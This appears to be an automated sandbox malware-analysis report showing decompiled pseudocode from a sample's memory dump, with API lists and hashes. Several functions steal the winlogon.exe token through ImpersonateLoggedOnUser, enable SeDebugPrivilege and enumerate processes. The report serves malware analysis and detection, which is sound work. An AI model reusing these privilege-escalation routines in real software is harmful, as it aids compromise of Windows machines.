                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2827331108-0
                                                                                                                    • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                    • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                    • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                    • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                    0x00401f04
                                                                                                                    0x00401f20
                                                                                                                    0x00401f27
                                                                                                                    0x00401f38
                                                                                                                    0x00401f3f
                                                                                                                    0x00401f4e
                                                                                                                    0x00401f54
                                                                                                                    0x00401f5f
                                                                                                                    0x00401f6e
                                                                                                                    0x00401f72
                                                                                                                    0x00401f77
                                                                                                                    0x00401f78
                                                                                                                    0x00401f91
                                                                                                                    0x00401f7a
                                                                                                                    0x00401f88
                                                                                                                    0x00401f8e
                                                                                                                    0x00401f8e
                                                                                                                    0x00401fa6
                                                                                                                    0x00401fa9
                                                                                                                    0x00401fae
                                                                                                                    0x00401fb0
                                                                                                                    0x00401fb2
                                                                                                                    0x00401fb9
                                                                                                                    0x00401fc2
                                                                                                                    0x00401fca
                                                                                                                    0x00401fd2
                                                                                                                    0x00401fd2
                                                                                                                    0x00401fd7
                                                                                                                    0x00401fd7
                                                                                                                    0x00401fe3

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00401F27
                                                                                                                    • memset.MSVCRT ref: 00401F3F
                                                                                                                      • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                      • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                    • wcslen.MSVCRT ref: 00401F5A
                                                                                                                    • wcslen.MSVCRT ref: 00401F69
                                                                                                                    • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                      • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                      • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                    • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                    • API String ID: 3867304300-2177360481
                                                                                                                    • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                    • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                    • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                    • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                    0x0040955f
                                                                                                                    0x00409566
                                                                                                                    0x0040956e
                                                                                                                    0x00409576
                                                                                                                    0x00409586
                                                                                                                    0x00409586
                                                                                                                    0x0040956e
                                                                                                                    0x00409592
                                                                                                                    0x004095aa
                                                                                                                    0x00409594
                                                                                                                    0x004095a3
                                                                                                                    0x004095a6
                                                                                                                    0x004095a6

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                    • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                    • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                    • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                    • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 84%
                                                                                                                    			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}











                                                                                                                    0x00402f3a
                                                                                                                    0x00402f51
                                                                                                                    0x00402f60
                                                                                                                    0x00402f6f
                                                                                                                    0x00402f78
                                                                                                                    0x00402f7a
                                                                                                                    0x00402f7a
                                                                                                                    0x00402f8a
                                                                                                                    0x00402f8f
                                                                                                                    0x00402f94
                                                                                                                    0x00402f99
                                                                                                                    0x00402f9e
                                                                                                                    0x00402f9f
                                                                                                                    0x00402fad
                                                                                                                    0x00402fb2
                                                                                                                    0x00402fb2
                                                                                                                    0x00402fbd
                                                                                                                    0x00402fc5

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00402F51
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                    • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                    • wcscat.MSVCRT ref: 00402F8A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                    • String ID: .cfg
                                                                                                                    • API String ID: 776488737-3410578098
                                                                                                                    • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                    • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                    • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                    • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 35%
                                                                                                                    			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                    0x00409ddc
                                                                                                                    0x00409de4
                                                                                                                    0x00409df0
                                                                                                                    0x00409df5
                                                                                                                    0x00409df6
                                                                                                                    0x00409e03
                                                                                                                    0x00409e05
                                                                                                                    0x00409e06
                                                                                                                    0x00409e3b
                                                                                                                    0x00409e5d
                                                                                                                    0x00409e6a
                                                                                                                    0x00409e73
                                                                                                                    0x00409e75
                                                                                                                    0x00409e08
                                                                                                                    0x00409e08
                                                                                                                    0x00409e19
                                                                                                                    0x00409e37
                                                                                                                    0x00409e37
                                                                                                                    0x00409e81

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00409E08
                                                                                                                      • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                      • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                    • memset.MSVCRT ref: 00409E3B
                                                                                                                    • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1127616056-0
                                                                                                                    • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                    • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                    • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                    • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                    0x00404951
                                                                                                                    0x00404952
                                                                                                                    0x00404956
                                                                                                                    0x004049a1
                                                                                                                    0x00404958
                                                                                                                    0x00404959
                                                                                                                    0x0040495b
                                                                                                                    0x0040495b
                                                                                                                    0x0040495f
                                                                                                                    0x00404961
                                                                                                                    0x00404963
                                                                                                                    0x0040496d
                                                                                                                    0x00404975
                                                                                                                    0x00404977
                                                                                                                    0x0040497b
                                                                                                                    0x00404985
                                                                                                                    0x0040498a
                                                                                                                    0x0040498e
                                                                                                                    0x00404993
                                                                                                                    0x0040499d
                                                                                                                    0x0040499d

                                                                                                                    APIs
                                                                                                                    • malloc.MSVCRT ref: 0040496D
                                                                                                                    • memcpy.MSVCRT ref: 00404985
                                                                                                                    • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                    • String ID: W@
                                                                                                                    • API String ID: 3056473165-1729568415
                                                                                                                    • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                    • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                    • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                    • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                    0x0040543f
                                                                                                                    0x00405456
                                                                                                                    0x00405462
                                                                                                                    0x00405467
                                                                                                                    0x0040546d
                                                                                                                    0x00405478
                                                                                                                    0x00405489
                                                                                                                    0x0040548d
                                                                                                                    0x00000000
                                                                                                                    0x00405492
                                                                                                                    0x00405496

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                      • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                      • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                      • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                    • wcscat.MSVCRT ref: 00405478
                                                                                                                    • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3725422290-0
                                                                                                                    • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                    • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                    • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                    • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                                      • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                                      • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                                      • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4232544981-0
                                                                                                                    • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                    • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                                    • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                    • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                    0x00408f4c
                                                                                                                    0x00408f57
                                                                                                                    0x00408f60
                                                                                                                    0x00408f62
                                                                                                                    0x00408f67
                                                                                                                    0x00408f67
                                                                                                                    0x00408f71

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                      • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 187924719-0
                                                                                                                    • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                    • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                    • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                    • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 37%
                                                                                                                    			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                    0x004098fa
                                                                                                                    0x004098fc
                                                                                                                    0x00409901
                                                                                                                    0x00409907
                                                                                                                    0x00000000
                                                                                                                    0x0040991c
                                                                                                                    0x00409918
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                      • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                      • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                      • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                      • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3859505661-0
                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                    • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                    • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                    0x004095da
                                                                                                                    0x004095da
                                                                                                                    0x004095de
                                                                                                                    0x004095e1
                                                                                                                    0x004095e7
                                                                                                                    0x004095e7
                                                                                                                    0x004095ee
                                                                                                                    0x004095fc

                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
